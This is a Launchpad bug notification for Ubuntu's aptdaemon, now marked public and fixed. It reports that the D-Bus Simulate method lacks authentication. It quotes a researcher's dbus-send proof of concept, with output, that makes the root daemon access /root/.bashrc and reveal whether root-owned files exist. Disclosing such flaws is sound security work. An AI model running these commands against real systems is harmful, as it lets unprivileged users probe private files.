[Bug 1449587] Re: SImulate dbus method doesn't require authentication

[Marc Deslauriers]

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to aptdaemon in Ubuntu.
https://bugs.launchpad.net/bugs/1449587

Title:
  SImulate dbus method doesn't require authentication

Status in aptdaemon package in Ubuntu:
  Fix Released

Bug description:
  Reported via email from Tavis Ormandy:

  -----

  $ dbus-send --print-reply --system --dest=org.debian.apt
  /org/debian/apt org.debian.apt.InstallFile string:/root/.bashrc
  boolean:false
  method return sender=:1.13166 -> dest=:1.13182 reply_serial=2
     string "/org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13"
  $ dbus-send --print-reply --system --dest=org.debian.apt
  /org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13
  org.debian.apt.transaction.Simulate
  Error org.debian.apt.TransactionFailed: error-invalid-package-file:
  Lintian check results for /root/.bashrc:
  warning: "/root/.bashrc" cannot be processed.

  $ dbus-send --print-reply --system --dest=org.debian.apt
  /org/debian/apt org.debian.apt.InstallFile string:/root/.bashrca
  boolean:false
  method return sender=:1.13166 -> dest=:1.13184 reply_serial=2
     string "/org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430"
  $ dbus-send --print-reply --system --dest=org.debian.apt
  /org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430
  org.debian.apt.transaction.Simulate
  Error org.debian.apt.TransactionFailed: error-unreadable-package-file:
  /root/.bashrca

  ----

  (mdeslaur): Not only does this expose the existence of arbitrary
  files, but it actually access them and processes untrusted packages.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/aptdaemon/+bug/1449587/+subscriptions